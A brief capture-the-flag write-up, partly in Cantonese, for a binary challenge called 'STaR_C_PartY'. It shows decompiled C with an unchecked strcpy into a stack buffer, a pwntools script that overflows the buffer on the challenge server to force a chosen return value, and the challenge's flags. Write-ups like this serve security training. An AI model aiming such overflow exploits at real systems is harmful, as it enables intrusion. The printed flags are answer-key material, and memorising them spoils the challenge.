Question
Solution
睇睇個main先啦1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26void __cdecl __noreturn main()
{
char v0; // [sp+58h] [bp-10h]@1
int v1; // [sp+5Ch] [bp-Ch]@1
int v2; // [sp+60h] [bp-8h]@1
v2 = 0;
alarm(0x3Cu);
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
puts("***^^^ STaR_C_PartY ^^^***");
puts("-- Welcome to the party --");
printf("Password: ");
v1 = 0;
if ( getline(&v1, &v0, stdin) == -1 )
{
perror("Failed reading user password");
exit(1);
}
if ( sub_8048800(v1) == -1059127554 )
{
puts("Oh, you're VIP, here's the special VIP ticket:");
system("cat /home/party/flag");
}
exit(0);
}
sub_80488001
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45int __cdecl sub_8048800(const char *a1)
{
const char *s1; // ST18_4@7
size_t v2; // eax@7
char *dest; // [sp+48h] [bp-40h]@4
int v5; // [sp+4Ch] [bp-3Ch]@4
FILE *stream; // [sp+50h] [bp-38h]@1
char s; // [sp+54h] [bp-34h]@1
int v8; // [sp+74h] [bp-14h]@1
const char *v9; // [sp+78h] [bp-10h]@1
v9 = a1;
v8 = 0;
memset(&s, 0, 0x20u);
stream = fopen("/home/party/orgs_password.txt", "r");
if ( !stream )
{
perror("Failed opening organisers password file");
exit(1);
}
v5 = 0;
dest = 0;
if ( getline(&dest, &v5, stream) == -1 )
{
fclose(stream);
perror("Failed organisers password");
exit(1);
}
fclose(stream);
dest[strcspn(dest, "\n")] = 0;
strcpy(&s, v9);
s1 = dest;
v2 = strlen(dest);
if ( !strncmp(s1, &s, v2) )
{
puts("Good password. Now you'll get your ticket...");
puts("Ticket id: timctf{0112-3581-3213-4558-9144}");
}
else
{
puts("Bad password. No ticket, go home!");
}
free(dest);
return v8;
}
似乎我地要做到既野正係需要令到 sub_8048800 既return變做0xC0DEFEFE 就完事1
2
3
4
5
6
7
8
9
10
11from pwn import *
p = remote("89.38.210.128", 31338)
password = 0xc0defefe
payload = "a"*32 + p32(password)
p.recvuntil("Password: ")
p.sendline(payload)
print p.recv(1024)
p.interactive()
Flag
1 | timctf{d0nt_cr4sh_th3_p4rty_b3_th3_p4rty} |